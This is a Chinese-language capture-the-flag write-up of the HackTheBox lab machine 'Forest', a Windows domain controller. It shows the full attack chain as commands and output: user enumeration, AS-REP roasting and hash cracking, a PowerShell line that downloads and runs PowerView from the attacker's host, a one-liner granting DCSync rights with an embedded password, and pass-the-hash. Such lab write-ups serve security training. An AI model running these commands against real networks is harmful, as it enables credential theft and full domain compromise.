Forest - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/212

• 10.10.10.161

端口扫描

windows域服务器：

$ nmap -sC -sV 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-10 13:27 CST
Nmap scan report for 10.10.10.161
Host is up (0.068s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-10 05:34:46Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m09s, median: 6m48s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-11-09T21:34:54-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-11-10T05:34:51
|_  start_date: 2020-11-10T03:18:44

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.57 seconds

rpcclient

rpc可以匿名登录，枚举信息：

rpcclient -U "" 10.10.10.161
Enter WORKGROUP\'s password:
rpcclient $>

enumdomusers

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[wasim] rid:[0x1db1]

users

把用户名提取出来，作为字典

Administrator
sebastien
lucinda
svc-alfresco
andy
mark
santi
wasim

GetNPUsers

就是使用前面得到的用户名字典，执行GetNPUsers，如果能够成功得到hash，就可以进行AS-REP Roasting：

for user in $(cat users.txt);do python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb.local/${user};done
...
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:0d853aa9ac40a229135644f5fc9c50c4$52bf89e2f77cb3e0a78dbe00bb3051b6e52488c2b2f090d5d22b768c6f1180fe5ad3b07fdd91497579bb0e6c24933f6dab51e92ffa94b380df3725326e27ea03bacad08192bf6e15ecabe6cc79ec3d38f05cf64235c8c3d5d5c1c6bd160db3e3a9e70520e2546c8627b344208ce05d65622f9bc1afdb0784282de0c6fc2523ad8a4c18f673a00fda94c706534fca8124069f9dfca7aabb6419b29afd8227e917caf5f5414ec87740b90f0c1a4e4e20f6c1e196115696bb52a096b3e2484fe04f5d266743a96ed4173baa36d1cd1412c945573ad0d53d1f74e068cdbebc04da3aa11ea8b53ebc
Impacket v0.9.22.dev1+20201105.154342.d7ed8dba - Copyright 2020 SecureAuth Corporation
...

john

破解得到的hash，得到svc-alfresco账户密码：

➜  Forest sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
[sudo] password for miao:
...

s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

...

user flag

5985端口开放，可以直接使用winrm登录，桌面得到user.txt:

BloodHound

然后就是BloodHound搜集信息，分析到域管的攻击路径：

• https://github.com/BloodHoundAD/BloodHound

上传，运行，下载结果，本地导入分析：

提权

Exchange Windows Permissions

首先需要加入到Exchange Windows Permissions组中：

net group "Exchange Windows Permissions" svc-alfresco /add /domain

然后Exchange Windows Permissions组有WriteDacl权限：

WriteDacl

滥用权限，使得我们可以执行DCSync,需要首先导入powerview：

• https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

会自动清理，所以整合成一行执行：

iex(new-object net.webclient).downloadstring('http://10.10.14.3:9999/PowerView.ps1')

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

DCSync

然后我们就可以用svc-alfresco账号执行DCSync，获取hash：

root flag

然后直接使用hash登录Administrator账号，桌面得到root.txt：

参考资料

• https://github.com/BloodHoundAD/BloodHound
• https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
• HTB: Forest | 0xdf hacks stuff
  https://0xdf.gitlab.io/2020/03/21/htb-forest.html
• https://www.hackthebox.eu/home/machines/writeup/212
• HackTheBox - Forest - YouTube
  https://www.youtube.com/watch?v=H9FcE_FMZio&feature=youtu.be&ab_channel=IppSec